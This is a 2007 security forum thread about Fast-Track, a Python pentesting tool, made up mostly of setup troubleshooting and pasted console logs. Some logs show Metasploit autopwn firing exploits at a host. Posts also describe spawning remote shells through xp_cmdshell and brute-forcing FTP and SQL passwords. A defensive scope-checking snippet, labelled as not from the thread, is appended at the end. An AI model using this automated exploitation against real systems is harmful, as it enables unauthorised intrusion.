Fast-Track Dev


pureh@te
05-25-2007, 12:44 AM
Ok so I've been searching for this swiss army tool by this guy rel1k to no avail, but I did find this (http://pastebin.ca/454351?srch=backtrack) so I'm gonna play with this script later and see where it goes. If anyone wants to look at it and tell me what they think, that would be cool. I think this is the script I'm after that's in the video.

Ok, not what I was after, but I'm scripting it now and I will run some tests. My evil twin is always hacking me.

pureh@te
05-25-2007, 02:26 AM
Ok, this is in Python, which I'm not familiar with. Someone please link me to a crash course to learn if you know. I copied and saved the script in KWrite. Now what?

Ok, now I got it saved in Kate because of syntax highlighting. I gave the file a py extension, then I chmod 755 "filename".py but I just get a new bash prompt. Someone save me. I knew I shoulda learned Python instead of Perl.

theprez98
05-25-2007, 04:05 AM
Maybe you need more than just that particular piece of code.

pureh@te
05-25-2007, 12:39 PM
You're right, it doesn't look complete, but I'm working on it. It was written by the same guy that did that video I'm after.

pipboy
05-25-2007, 07:05 PM
"this rel1k guy" is in the irc, although I'm not sure if he just wants to give away his code as of yet because to my knowledge he's still working on it.

*edit* That looks like that's it, but like I said he's doing plenty of work on it.

pureh@te
05-25-2007, 08:42 PM
Ok, he emailed me back; the script I found is different. I got it working but the script is incomplete, so you have to edit it and fill in the paths for your preferred tools. I'm currently building my own but I'm getting married this weekend and going to Hawaii, and on the advice of my friends I'm leaving all my computers at home. So after next week I'll post my revised script with full path somewhere. The down low on the SecureState swiss army tool is that it is still in the testing phase; he said it will be done in a month or so and I have offered to beta test it for him. So as soon as it's available, and if it's OK with him, I'll share it or share the link or whatever I can get from him. If you PM me about the script and I don't answer, it's because I'm in Hawaii. WWWWHHHHeEEEEEEEEEEEEEE http://www.islandcars.net/car_rental_kauai_images/palm_tree.gif

I also found a cool plugin for Kate that works well with Python here (http://paul.giannaros.org/pate/)

theprez98
05-25-2007, 11:32 PM
> Ok, he emailed me back; the script I found is different. I got it working but the script is incomplete, so you have to edit it and fill in the paths for your preferred tools. I'm currently building my own but I'm getting married this weekend and going to Hawaii, and on the advice of my friends I'm leaving all my computers at home. So after next week I'll post my revised script with full path somewhere. The down low on the SecureState swiss army tool is that it is still in the testing phase; he said it will be done in a month or so and I have offered to beta test it for him. So as soon as it's available, and if it's OK with him, I'll share it or share the link or whatever I can get from him. If you PM me about the script and I don't answer, it's because I'm in Hawaii. WWWWHHHHeEEEEEEEEEEEEEE http://www.islandcars.net/car_rental_kauai_images/palm_tree.gif
>
> I also found a cool plugin for Kate that works well with Python here (http://paul.giannaros.org/pate/)

Have a safe and fun trip. Hopefully we won't see you until you get back! ;)

pureh@te
05-26-2007, 04:00 AM
Thanks guys. I at least snuck a book on Python in the luggage to read on the beach so I can complete the tool when I get home.

-=Xploitz=-
08-10-2007, 07:06 PM
You weren't talking about this, were you, purehate? I found this while searching for packet construction stuff....

cryptcat
TCP/IP swiss army knife extended with twofish encryption

Mythos
08-10-2007, 10:24 PM
> You weren't talking about this, were you, purehate? I found this while searching for packet construction stuff....
>
> cryptcat
> TCP/IP swiss army knife extended with twofish encryption

Doubt it, I've seen the video he's referring to by rel1k. It just looks like an extremely handy script :P

It won't let me post a picture, something about 15 posts....

PrairieFire
08-10-2007, 10:50 PM
You can post the link just drop the http://www.com

Mythos
08-10-2007, 10:54 PM
http ://img266.imageshack.us/img266/8862/swissarmynp7.jpg

Here's a screenshot of what it looks like.
Just remove the space :)

relik
08-15-2007, 01:11 AM
Hey guys, I'm mostly on IRC in RE, you can always find me there. Little update on the tool is I'm working on it and should be ready by the release of BT3, I got a little tied up with work, multiple trips to China, and taking my CISSP soon. I got the SQL portions finished, and am now working on the null sessions / auto brute functions. My goal is to make it so it can check back with remote-exploit and keep it up to date, so we can add tools, and make things easier. As well as making pentesting a little easier as well (menu driven). I'll keep you guys posted. As for Hawaii, I lived on Oahu for 4 years :) Lovely place!

Later!

ReL1K

shamanvirtuel
08-15-2007, 01:46 AM
Nice, it looks really nice.....this tool was a myth, a kind of legend lol....
I googled my ass off for this "swiss army knife", for the attack.py too...lol

can't wait to test it out...................

thx to you for giving news.........:D

relik
08-16-2007, 04:30 PM
We will see :) Got a lot of work to do, I want to get at least the null sessions portion working, and all the update stuff. Also adding a sql injector that when you find a link, it tries to enable xp_cmdshell and spawn a remote shell. All plans coming soon!

shamanvirtuel
08-16-2007, 04:50 PM
nice ....really nice..your sql injector is really a good idea, all things together.....could be really efficient......:)

pureh@te
08-18-2007, 12:08 AM
> We will see :) Got a lot of work to do, I want to get at least the null sessions portion working, and all the update stuff. Also adding a sql injector that when you find a link, it tries to enable xp_cmdshell and spawn a remote shell. All plans coming soon!

I can't wait, rel1k. I've had a great time tweaking the attack suite .py script and I hope to test the swiss army knife :)

vsotolkanachinaietsa
09-08-2007, 01:03 PM
Hi guys.
I saw this video and I think that it's a pretty nice attack to wins system.
But before you release new BT3 this xp problem will be corrected by windows programmer group.
And now it will be nice if you issue your attack.py because other time this troubleshoot about SQL injection using 1236 port will be eradicated.
Waiting for your answer rel1K. :D
Or source code of attack.py, I have emailed several times to milw0rm's str0ke but he didn't have it.

pureh@te
09-08-2007, 05:00 PM
You are confused; the attack.py script is NOT the tool seen in rel1k's video.

vsotolkanachinaietsa
09-08-2007, 06:00 PM
> You are confused; the attack.py script is NOT the tool seen in rel1k's video.

Look: http://milw0rm.com/video/watch.php?id=66 it's rel1K's video,
and the tool was attack.py. What are you asking for me?

pureh@te
09-10-2007, 12:24 AM
Ok, so I was wrong, that is it, so what is your issue? Just go download the script and use it now. What's the problem?

relik
10-24-2007, 05:50 PM
Guys,

Had some more time to work on it, you can get a copy of it at

http://www.securestate.com/files/fasttrack/fast-trackv0.3.py

There's a demo movie on how to use it at:

http://www.securestate.com/files/fasttrack/index.html

Take a peek... I haven't updated the video yet to add the Metasploit Autopwn Automation portion, I wrote that last night in like 3 hours, but if you go to menu two, you'll see it loads the database, the table, and then nmap scans based on what you provided in the menu... it exploits, all you have to type is the sessions -l and sessions -i <id> number.

Take a peek at the help/creds, walks through it a little bit.

Take a peek and let me know what you guys think, I'm going to add a mysql portion that does the same thing as the mssql portion when I get some more time. If anyone else wants to help with this, let me know, I am often very busy in life :)

pureh@te
10-25-2007, 10:34 PM
I totally missed this yesterday. rel1k, I will try it out asap. :)

rokrmc
10-26-2007, 08:22 AM
I got this error when I type:

msf > db_autopwn -t -p -e
[-] Error while running command db_autopwn: no such file to load -- sqlite3

relik
10-26-2007, 03:30 PM
Hmmm,

Tested this out on Ubuntu using Sqlite3, let me see what DB Back|Track is using, thought it was sqlite3 as well. I'll update it as soon as I find out, need to get a VM of backtrack installed now I guess :)

balding_parrot
10-26-2007, 03:44 PM
I cannot remember what the default version is, but I seem to remember it is 3.3.7, I made a tutorial on updating it to 3.4.0 as Aircrack now needs 3.3.17 or higher and there is a problem upgrading it, I also made a module of 3.4.0 available here (http://rapidshare.com/files/41948177/sqlite-3.4.0.lzm) if that helps.

I plan later today to make a 3.5.1 module available, as Aircrack is already making that a min requirement under windows, so it won't be long before it affects Linux too.
In fact here (http://rapidshare.com/files/65309038/sqlite-3.5.1.lzm) is a link to 3.5.1 just in case.

relik
10-26-2007, 04:06 PM
Fixed, check out www.securestate.com/files/fasttrack/fast-trackv0.4.py

Check it out.

rokrmc
10-26-2007, 05:41 PM
Also get same error............

msf > db_nmap 192.168.1.105

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-27 00:34 GMT
Interesting ports on 192.168.1.105:
Not shown: 1695 closed ports
PORT STATE SERVICE
631/tcp open ipp
6000/tcp open X11

Nmap finished: 1 IP address (1 host up) scanned in 10.372 seconds
[-] Error while running command db_nmap: no such file to load -- sqlite3
msf > db_autopwn -t -p -e
[-] Error while running command db_autopwn: no such file to load -- sqlite3
msf >

relik
10-26-2007, 08:24 PM
Thanks for the feedback, alright, I tried making it easy to load multiple databases without expecting anything. I reuploaded the file and added a choice for you to pick your database, follow the instructions and you should be all set. It's not going to try sqlite3 unless you specify. Can download from link above, kept it on 0.4.

Keep me posted :)

rokrmc
10-27-2007, 08:44 AM
Still not working...

bt ~ # ./fast-trackv0.4.py


Back|Track v3.0 http://www.remote-exploit.com

Fast|Track version 0.1 Beta

Please report bugs to the below address:

Written by: David Kennedy,
Handle:ReL1K
Company: SecureState
IRC: freenode and Astalavista

Be sure to check out the Help/Creds for more information and
shout-outs.

If you want to use the sql functions, make sure you install
FreeTDS and PYMSSQL from the Updates menu.

MAKE SURE YOU RUN THIS AS ROOT!!!

DISCLAIMER: This is only for testing purposes and can only be
used where strict consent has been given. Do not use this for
illegal purposes period.


Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 2

External Pentesting Menu:

1. Port Scanning
2. Exploitation (Metasploit)
3. Autopwn Metasploit Automated (requires pexpect from main menu)
4. Return to Previous Menu

Enter a number: 2
What do you want to launch, the MSF console or MSFWeb Interfaces?

Enter 1 for console 2 for web: 1
Launching MSFConsole

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.1-dev
+ -- --=[ 247 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 43 aux

msf > load db_sqlite3
Successfully loaded plugin: db_sqlite3
msf > db_create pentest
Creating a new database instance...
CREATE TABLE hosts (
'id' INTEGER PRIMARY KEY NOT NULL,
'address' VARCHAR(16) UNIQUE,
'comm' VARCHAR(255),
'name' VARCHAR(255),
'state' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE refs (
'id' INTEGER PRIMARY KEY NOT NULL,
'ref_id' INTEGER,
'name' VARCHAR(512)
);
CREATE TABLE services (
'id' INTEGER PRIMARY KEY NOT NULL,
'host_id' INTEGER,
'port' INTEGER NOT NULL,
'proto' VARCHAR(16) NOT NULL,
'state' VARCHAR(255),
'name' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE vulns (
'id' INTEGER PRIMARY KEY NOT NULL,
'service_id' INTEGER,
'name' VARCHAR(1024),
'data' TEXT
);
CREATE TABLE vulns_refs (
'ref_id' INTEGER,
'vuln_id' INTEGER
);
msf > db_nmap 192.168.1.105

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-27 14:00 GMT
Interesting ports on 192.168.1.105:
Not shown: 1695 closed ports
PORT STATE SERVICE
631/tcp open ipp
6000/tcp open X11

Nmap finished: 1 IP address (1 host up) scanned in 9.350 seconds
[-] Error while running command db_nmap: no such file to load -- sqlite3
msf > db_autopwn -t -p -e
[-] Error while running command db_autopwn: no such file to load -- sqlite3
msf > db_autopwn
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

msf >

relik
10-27-2007, 08:28 PM
Did you re-download it? Works fine for me on BackTrack v2 now....not getting a db sqlite3 message.

rokrmc
10-27-2007, 08:35 PM
Yes but still have same problem.......

PrairieFire
10-27-2007, 10:33 PM
> Did you re-download it? Works fine for me on BackTrack v2 now....not getting a db sqlite3 message.

I receive a similar error video (http://tinyurl.com/32xqll).

Using ssh to an unaltered vmware image of BT2Final.iso

pureh@te
10-28-2007, 01:35 AM
Interesting ports on 192.168.1.1:
Not shown: 1696 filtered ports
PORT STATE SERVICE
53/tcp closed domain
MAC Address: 00:14:6C:F6:36:78 (Netgear)

All 1697 scanned ports on 192.168.1.2 are filtered
MAC Address: 00:0C:F1:A8:61:DB (Intel)

All 1697 scanned ports on 192.168.1.3 are filtered
MAC Address: 00:10:C6:44:99:8E (USI)

Interesting ports on 192.168.1.5:
Not shown: 1694 closed ports
PORT STATE SERVICE
22/tcp open ssh
631/tcp open ipp
6000/tcp open X11

Nmap finished: 256 IP addresses (4 hosts up) scanned in 55.881 seconds
[-] Error while running command db_nmap: no such file to load -- sqlite3
msf >


I have a similar output

shamanvirtuel
10-28-2007, 05:38 AM
here is the solution .:cool:... maybe Rel1k can include this into his script (if i can help or build a gui .... just pm)

FIRST THING BEFORE STARTING FAST TRACK

start-db_autopwn
sudo -s postgres

fastrack-0.4.py

fasttrack update

update all stuff for sql & autopawn

EXTERNAL HACKING / AUTOPAWN.........

IPS

type postgres for database

and it roxxxxxxxxxxxxx

THX A LOT RELIK, BTW THREAD TITLE CHANGED........ THREAD MOVED TO APPROPRIATE CORNER............

PrairieFire
10-28-2007, 06:37 AM
> sudo -s postgres

bt ~ #sudo -s postgres
/usr/local/pgsql/bin/postgres: /usr/local/pgsql/bin/postgres: cannot execute binary file
bt ~ #


Noticed you cannot exit from:

2. External Hackin -> 3. Autopwn Metasploit Automated -> (ip range) -> (database)
msf> exit
Enter ip ranges to autopwn:

shamanvirtuel
10-28-2007, 07:43 AM
yep sorry ;;;;

this works ......

I know rel1k says to run as root ... but ......
the 'root role' for psql doesn't exist..............

you need to run psql as postgres user

the pb is when you try that...... pgsql is not here ... missing path .... so

under postgres account we add it

bt root $ su postgres
bt root $ PATH=$(echo $PATH':/usr/local/pgsql/bin')
bt root $ start-db_autopwn
[************************************************** ************]
Postgres should be setup now. To run db_autopwn, please:
# su - postgres
# cd /pentest/exploits/framework3
{*] # ./msfconsole
msf> load db_postgres
[************************************************** ************]
bt root $ sudo -u postgres postgres
bt root $ whoami
postgres
bt root $ cd Desktop
bt Desktop $ ./fast-trackv0.4.py


Back|Track v3.0 http://www.remote-exploit.com (http://www.remote-exploit.com/)

Fast|Track version 0.1 Beta

Please report bugs to the below address:

Written by: David Kennedy,
Handle:ReL1K
Company: SecureState
IRC: freenode and Astalavista

Be sure to check out the Help/Creds for more information and
shout-outs.

If you want to use the sql functions, make sure you install
FreeTDS and PYMSSQL from the Updates menu.

MAKE SURE YOU RUN THIS AS ROOT!!!

DISCLAIMER: This is only for testing purposes and can only be
used where strict consent has been given. Do not use this for
illegal purposes period.


Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 2

External Pentesting Menu:

1. Port Scanning
2. Exploitation (Metasploit)
3. Autopwn Metasploit Automated (requires pexpect from main menu)
4. Return to Previous Menu

Enter a number: 3

Metasploit Autopwn Automation

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1/24
or whatever you want and it'll run against those hosts. When it has completed exploiting
simply type this:

sessions -l (lists the shells spawned)
sessions -i <id> (jumps you into the sessions)


Enter the ip ranges to autopwn: 192.168.1.1


What database are you using? BackTrack uses postgres, others prefer sqlite3. If your
using BackTrack by default, just type postgres, if not type sqlite3

Choice postgres or sqlite3: postgres
Port scanning hosts...
Attacking hosts...be patient...
None
load db_postgres
db_create pentest
db_nmap 192.168.1.1
db_autopwn -p -t -e

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....: :..::..:
::::::::::::::::::::::::::::::::::8::::::::::::::: ::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::


=[ msf v3.1-dev
+ -- --=[ 247 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 43 aux

msf > load db_postgres
Successfully loaded plugin: db_postgres
msf > db_create pentest
CREATE DATABASE
ERROR: table "hosts" does not exist
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE / UNIQUE will create implicit index "hosts_address_key" for table "hosts"
ERROR: table "services" does not exist
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
ERROR: table "vulns" does not exist
NOTICE: CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
ERROR: table "refs" does not exist
NOTICE: CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
ERROR: table "vulns_refs" does not exist
Database creation complete (check for errors)
msf > db_nmap 192.168.1.1

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-28 08:22 GMT
Interesting ports on 192.168.1.1:
Not shown: 1694 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp open telnet
80/tcp open http

Nmap finished: 1 IP address (1 host up) scanned in 12.767 seconds
msf > db_autopwn -p -t -e
Analysis completed in 30.0178060531616 seconds (0 vulns / 0 refs)
Matched exploit/windows/http/badblue_ext_overflow against 192.168.1.1:80...
Launching exploit/windows/http/badblue_ext_overflow (1/42) against 192.168.1.1:80...
Started bind handler
Matched exploit/windows/isapi/w3who_query against 192.168.1.1:80...
Trying target BadBlue 2.5 (Universal)...
Matched exploit/solaris/telnet/fuser against 192.168.1.1:23...
Launching exploit/solaris/telnet/fuser (3/42) against 192.168.1.1:23...
Started bind handler
.....
......

relik
10-28-2007, 07:19 PM
Will incorporate this into the script so you don't have to type this... Should be able to knock it out before Tuesday, I don't do things on the weekend :)

rokrmc
10-29-2007, 12:46 PM
Finally, I solved the problem........thanks relik for a great tool......

bt ~ # ./fast-trackv0.4.py


Back|Track v3.0 http://www.remote-exploit.com

Fast|Track version 0.1 Beta

Please report bugs to the below address:

Written by: David Kennedy,
Handle:ReL1K
Company: SecureState
IRC: freenode and Astalavista

Be sure to check out the Help/Creds for more information and
shout-outs.

If you want to use the sql functions, make sure you install
FreeTDS and PYMSSQL from the Updates menu.

MAKE SURE YOU RUN THIS AS ROOT!!!

DISCLAIMER: This is only for testing purposes and can only be
used where strict consent has been given. Do not use this for
illegal purposes period.


Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 2

External Pentesting Menu:

1. Port Scanning
2. Exploitation (Metasploit)
3. Autopwn Metasploit Automated (requires pexpect from main menu)
4. Return to Previous Menu

Enter a number: 2
What do you want to launch, the MSF console or MSFWeb Interfaces?

Enter 1 for console 2 for web: 1
Launching MSFConsole

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 248 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 43 aux

msf > load db_sqlite3
Successfully loaded plugin: db_sqlite3
msf > db_create pentest
Creating a new database instance...
CREATE TABLE hosts (
'id' INTEGER PRIMARY KEY NOT NULL,
'address' VARCHAR(16) UNIQUE,
'comm' VARCHAR(255),
'name' VARCHAR(255),
'state' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE refs (
'id' INTEGER PRIMARY KEY NOT NULL,
'ref_id' INTEGER,
'name' VARCHAR(512)
);
CREATE TABLE services (
'id' INTEGER PRIMARY KEY NOT NULL,
'host_id' INTEGER,
'port' INTEGER NOT NULL,
'proto' VARCHAR(16) NOT NULL,
'state' VARCHAR(255),
'name' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE vulns (
'id' INTEGER PRIMARY KEY NOT NULL,
'service_id' INTEGER,
'name' VARCHAR(1024),
'data' TEXT
);
CREATE TABLE vulns_refs (
'ref_id' INTEGER,
'vuln_id' INTEGER
);
msf > db_nmap 192.168.1.105

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-29 19:38 GMT
Interesting ports on 192.168.1.105:
Not shown: 1695 closed ports
PORT STATE SERVICE
631/tcp open ipp
6000/tcp open X11

Nmap finished: 1 IP address (1 host up) scanned in 9.291 seconds
msf > db_autopwn -t -p -e
Analysis completed in 13.9838120937347 seconds (0 vulns / 0 refs)
msf >

relik
10-29-2007, 06:34 PM
Alright guys, reuploaded a newer version, I scrapped trying to fix the postgres stuff and just appended a howto if you want to use postgres. I added a menu in the Fast|Track updates page that installs the latest version of sqlite3 and the ruby addons to work within metasploit. Just by typing 9, it installs it, and just type sqlite3 in the autopwn automation menu and you're good to go on BackTrack 2.

I removed all the Ubuntu stuff, since this is getting customized specifically for BackTrack.

www.securestate.com/files/fasttrack/fast-trackv0.5.py

pureh@te
10-29-2007, 06:41 PM
Thanks for the work rel1k. We appreciate the addition to the BT arsenal.

shamanvirtuel
10-29-2007, 06:52 PM
will test this asap ....

I had a look in the code, and was surprised how simply coded it is....

Python's cool really.... but unfortunately it's not easy to build GUIs under Python.....

what are you using to code Python? SPE (in BT) or another?

relik
10-29-2007, 07:41 PM
> will test this asap ....
>
> I had a look in the code, and was surprised how simply coded it is....
>
> Python's cool really.... but unfortunately it's not easy to build GUIs under Python.....
>
> what are you using to code Python? SPE (in BT) or another?

Actually, I use kwrite, just a text editor, I use the Python IDLE in Windows for the GUI sometimes if I'm making stuff in Windows, but in Linux it's easy enough to do it through kwrite. Appreciate the feedback, I'll continue to add on to it, v0.6 will have the update script working, figure a simple wget to the latest version to at least keep it updated. Should be easy to keep it updated that way. I could always svn it.

relik
10-29-2007, 07:42 PM
and btw: http://www.pygtk.org/ for GUI, very easy too.

relik
10-29-2007, 08:29 PM
Ok guys, you can download the latest version at:

http://www.securestate.com/files/fasttrack/fast-track.py

Made some changes, 1, the update menu is now functional. So when you go to fast-track updates, it has a menu 7 for update fast-track. It does a wget and pulls the latest version. Simply restart fast-track and you're golden with the latest updates.

So I also added a check before you run the autopwn metasploit automation if you want to update Metasploit before you run it, if you type no, it obviously goes through and does the autopwn, if you do yes, it updates it.

That's it for now :)

rokrmc
10-30-2007, 02:22 PM
Hi relik..

Thanks relik for updating the fast-track tool...I can use the postgres plugin and the sqlite3 plugin in bt 2..

This is what I do to use the postgres plugin and it works for me...

bt ~ # su postgres
bt root $ PATH=$(echo $PATH':/usr/local/pgsql/bin')
bt root $ start-db_autopwn
[************************************************** ************]
Postgres should be setup now. To run db_autopwn, please:
# su - postgres
# cd /pentest/exploits/framework3
{*] # ./msfconsole
msf> load db_postgres
[************************************************** ************]
bt root $ sudo -u postgres postgres
bt root $ ruby -e 'require "rubygems"; require_gem "postgres";'
bt root $ ./fast-track.py

and to use the sqlite3 plugin just type...

bt ~ # ./fast-track.py

But I got another problem when using internal hackin. After installing PYMMSQL and FreeTDS from the main menu the problem still exists...

Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 3
What doya wanta do:


1. Scan for SQL, spawn xp_cmdshell
2. Port Scanning
3. Go Back a previous menu

Enter a number: 1


Did you install PYMMSQL and FreeTDS from the main menu? If not, go install it dude :P


Returning to main menu....


What doya wanta do:


1. Scan for SQL, spawn xp_cmdshell
2. Port Scanning
3. Go Back a previous menu

relik
10-30-2007, 07:43 PM
Is this from the latest one? I added a ldconfig at the end of it or else you required a reboot. Have you downloaded the latest version? Works fine on my BT2 box..curious

shamanvirtuel
10-31-2007, 12:04 AM
no pb for the moment with last version....
nice !

rokrmc
10-31-2007, 12:35 PM
After I used the latest one, then installed PYMMSQL and FreeTDS again, now it works...

shamanvirtuel
10-31-2007, 02:10 PM
yep it rox ........
really thx ........

relik
10-31-2007, 02:47 PM
Glad to hear it's working! Keep me posted if you notice anything....I was sniffing some packets with wireshark, the single wordlist brute forcer rules, I'm going to add about 30 more different passwords for testing SQL that I have found while doing pentests

shamanvirtuel
10-31-2007, 07:59 PM
just a trick, you may add an up-to-date sqlite version, I mean do a cvs checkout on the VERSION file only and get the latest available release...

I mean something like this

import os

# write the two-line .cvspass file that the anonymous pserver login needs
os.system('echo "/1 :pserver:anonymous@sqlite.org:2401/sqlite Ay=0=a%0bZ" > /root/.cvspass && echo "/1 :pserver:anonymous@www.sqlite.org:2401/sqlite Ay=0=a%0bZ" >> /root/.cvspass')

# check out only the VERSION file
os.system('cvs -d :pserver:anonymous@www.sqlite.org:/sqlite checkout sqlite/VERSION')

# show the version string
os.system('cat ./VERSION')
replace smilies by ":p"
the first os.system command creates a 2 line file that contains the passwd hash for the next commands (mandatory)

result = 3.5.1 for the moment, you get this as a string and display it in your update module.......useful


I don't know if you are going to use this but it's a little nice thing to implement, let your users know which version is available......

shamanvirtuel
11-14-2007, 02:47 AM
and just wonder to know why you NEED Pexpect

i mean why don't you simply put

load db_sqlite3
db_create pentest
db_nmap 192.168.1.11
db_hosts
db_autopwn -p -t -e
sessions -l

in a text file named /tmp/test you can create dynamically with the options (sqlite & ip)

and after you simply do

os.system('/pentest/exploits/framework3/msfconsole -r /tmp/test')

maybe more simple......

relik
11-15-2007, 07:52 PM
os.system spawns an instance of a shell, in order to jump into that shell you need to jump into the pid. I guess I could keep a store of the pid, and jump into it when it does the sessions -l but would be an extra 30 lines of code. It was extremely easy to put child.sendline, and child.interact(), not sure why I would complicate it with the text file and process jumping?

s1lang
12-20-2007, 12:29 AM
Ok firstly thank you for a great program :)

I've had a look at the Python coding and this is the first time I've ever seen it, as I've been doing a lot of C programming lately this doesn't seem as "hard" as I was expecting.

However, I'm stumped on presumably an easy bit.

When doing the FTP Bruteforce, I've created a 10 liner wordlist to test it on my FTP with the last being my password, however it only tests the first 7 letters when my password, like any good password is in excess of this. How do I increase the password length in the coding??
Thanks guys :)

edit:
Ignore my bamblings. Got it fixed it wasn't a case of it not doing more than 7 digits it's I forgot to press enter to create a new line after the last word, therefore not taking into account the last letter.
I love this site, I've learnt so much over the last week now I'm on my Christmas Hols, all thanks to you guys :)

The_Denv
01-23-2008, 06:40 AM
Hello relik,

Once again, great program.

After using Fast-Track 2.0 and Autopwn on my own network, the target being my friend's laptop..failed [Which is good], as it's secure. Although when me and my friend decided to do a remote attack against his IP address [obviously with consent, he's been my friend for over 10 years], db_nmap automatically ran the scan without '-PN' and the scan failed instantly due to his router blocking ping probes. I done it manually of course and his computer was secure, all is good for both me and my friend. :)

Question: Even though I done it manually and my goals were achieved, within the next release of Fast-Track could you add an option to scan with db_nmap with or without the avoidance of blocked ping probes?

No big deal, just a thought.

Delta
01-23-2008, 07:37 AM
whooozaa this is great!!
works well:D

relik
01-23-2008, 04:01 PM
You should be able to do a -PN 192.168.1.1-254 or whatever when it prompts you for the IP address ranges...that will work since I'm taking the entire string. I'll add more of an explanation of syntax in the menu on next update!

The_Denv
01-23-2008, 07:32 PM
> You should be able to do a -PN 192.168.1.1-254 or whatever when it prompts you for the IP address ranges...that will work since I'm taking the entire string. I'll add more of an explanation of syntax in the menu on next update!

Ahh, happy days. Didn't know this was already implemented as there was no notice. Thanks again relik!
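
relik's reply above says the range prompt forwards the entire string, so an option such as -PN travels with the targets. As an added example (not Fast-Track's code and not from any poster in this thread), one way to split such a string into options and nmap-style targets and check every target against an authorised scope before it is forwarded; the function names, the one-entry option allow-list and the scope list are assumptions.

```python
import ipaddress

# Assumption: -PN is the only option let through, because it is the only one
# discussed in the thread. Any other token starting with "-" is rejected.
ALLOWED_OPTIONS = {"-PN"}


def _octet_range(spec):
    """Return (low, high) for one nmap-style octet: '5', '1-254', '-254', '*'."""
    if spec == "*":
        return 0, 255
    if not spec:
        raise ValueError("empty octet")
    low, dash, high = spec.partition("-")
    if not dash:
        high = low
    low, high = low or "0", high or "255"  # open-ended ranges default to 0 / 255
    for part in (low, high):
        if not (part.isascii() and part.isdigit()):
            raise ValueError("bad octet %r" % spec)
    low, high = int(low), int(high)
    if not 0 <= low <= high <= 255:
        raise ValueError("bad octet range %r" % spec)
    return low, high


def target_bounds(target):
    """Lowest and highest IPv4 address a target token can expand to.

    Handles CIDR (192.168.1.1/24) and per-octet ranges (192.168.1.1-254).
    Host names are rejected: they cannot be scope-checked without resolving.
    """
    if "/" in target:
        net = ipaddress.IPv4Network(target, strict=False)
        return net.network_address, net.broadcast_address
    parts = target.split(".")
    if len(parts) != 4:
        raise ValueError("not a dotted IPv4 target: %r" % target)
    ranges = [_octet_range(p) for p in parts]
    first = ipaddress.IPv4Address(".".join(str(lo) for lo, _ in ranges))
    last = ipaddress.IPv4Address(".".join(str(hi) for _, hi in ranges))
    return first, last


def review_prompt(text, scope):
    """Sort the tokens of a range-prompt string into options, in-scope targets
    and rejected tokens. `scope` is a list of authorised CIDR networks."""
    nets = [ipaddress.IPv4Network(s) for s in scope]
    result = {"options": [], "in_scope": [], "rejected": []}
    for token in text.split():
        if token.startswith("-"):
            key = "options" if token in ALLOWED_OPTIONS else "rejected"
            result[key].append(token)
            continue
        try:
            first, last = target_bounds(token)
        except ValueError:
            result["rejected"].append(token)
            continue
        # Conservative test: the lowest and highest address must sit in the
        # same authorised network, so everything between them does too.
        ok = any(first in n and last in n for n in nets)
        result["in_scope" if ok else "rejected"].append(token)
    return result


if __name__ == "__main__":
    # Constructed sample input: one authorised lab network, three prompt strings.
    lab_scope = ["192.168.1.0/24"]
    for line in ("-PN 192.168.1.1-254",
                 "192.168.1.-254 10.0.0.5",
                 "192.168.1-2.1 -sV example.com"):
        print(repr(line), "->", review_prompt(line, lab_scope))
```

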